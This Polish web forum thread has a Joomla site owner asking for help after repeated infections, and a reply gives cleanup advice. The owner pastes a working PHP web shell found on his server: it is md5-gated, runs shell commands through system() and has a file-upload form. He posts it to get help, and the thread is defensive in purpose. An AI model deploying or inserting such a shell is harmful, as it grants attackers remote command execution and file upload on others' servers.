PDA

Zobacz pełną wersję : Nowe pliki i wstrzykiwany kod do już istniejących



vereb
23-02-2016, 22:30
Cześć,
mam spory problem. Od pewnego czasu (mam wrażenie że od pewnej aktualizacji J!) praktycznie co kilka dni IP mojego serwera wpadał do antyspamowej blokady CBL. Stronę czyściłem. Problem się powtarzał. Poprosiłem o przeskanowanie strony @trzepiz'a - znalazł zainfekowane pliki i wszystko wyczyścił (Michał, bardzo dziękuję za pomoc :) ). Teraz niby jest ok, ale cały czas Admin Tools wyłapuje próby logowania i innych ataków. Wrzucam IP do black listy, niestety codziennie mam nowe ataki. Coś się uparło na IP serwera. Ostatnio jednak AT wyłapało nowy plik o takiej treści:


<?php if(md5($_GET["ms-load"])=="211482534c08b94ad061174d49f8e237"){
$c=$_GET['cmd'];
system($c);
$p=$_SERVER["DOCUMENT_ROOT"];
$yoco=dirname(__FILE__);
echo <<<HTML
<form enctype="multipart/form-data" method="POST">
Path:$p<br>
<input name="file" type="file"><br>
To:<br>
<input size="48" value="$yoco/" name="pt" type="text"><br>
<input type="submit" value="Upload">
$tend
HTML;
if (isset($_POST["pt"])){
$uploadfile = $_POST["pt"].$_FILES["file"]["name"];
if ($_POST["pt"]==""){$uploadfile = $_FILES["file"]["name"];}
if (copy($_FILES["file"]["tmp_name"], $uploadfile)){
echo"uploaded:$uploadfilen";
echo"Size:".$_FILES["file"]["size"]."n";
}else {
print "Error:n";
}
}
}


Zastanawiam się czy dałoby się namierzyć gdzie idzie wysyłka tego formularza. Jeśli nie to czy mogę tak zabezpieczyć plik, aby nie mógł być edytowany/nadpisywany? Zmieniłem jego treść i przyzwolenia. Dziś jednak widzę że plik został nadpisany ponownie z powyższą zawartością.

Nie wiem co dalej...

Pozdrówka, Vereb

maccoo
01-03-2016, 00:49
Skanowanie plików nie zawsze wskaże pliki zainfekowane. Pliki zakodowane a wykonujące jakąś akcję będą często ignorowane przez skanery. Próby logowania i ataków są codziennością.
Jeśli używasz admin toolsa to przeprowadz skanowanie zmian w plikach. Na liście podejrzanych można "gołym okiem" zauważyć plik nietypowo nazwany np. menu343.php, 3434.php, jquery.php. Na Twoim serwerze jest na pewno jakiś plik zakodowany. Odnalezienie go nie będzie łatwe. Można pobrac wszystko na lokalny dysk i skanowac, przeglądać pliki, porównywać zawartość katalogów do tych z przed wgrania pliku. Logi systemowe oczywiście sprawdzone, chociaż czasem nic tam nie widać.
Zmień wszystkie możliwe hasła, zaktualizuj wersje php na serwerze.

- - - Updated - - -

Skanowanie plików nie zawsze wskaże pliki zainfekowane. Pliki zakodowane a wykonujące jakąś akcję będą często ignorowane przez skanery. Próby logowania i ataków są codziennością.
Jeśli używasz admin toolsa to przeprowadz skanowanie zmian w plikach. Na liście podejrzanych można "gołym okiem" zauważyć plik nietypowo nazwany np. menu343.php, 3434.php, jquery.php. Na Twoim serwerze jest na pewno jakiś plik zakodowany. Odnalezienie go nie będzie łatwe. Można pobrac wszystko na lokalny dysk i skanowac, przeglądać pliki, porównywać zawartość katalogów do tych z przed wgrania pliku. Logi systemowe oczywiście sprawdzone, chociaż czasem nic tam nie widać.
Zmień wszystkie możliwe hasła, zaktualizuj wersje php na serwerze.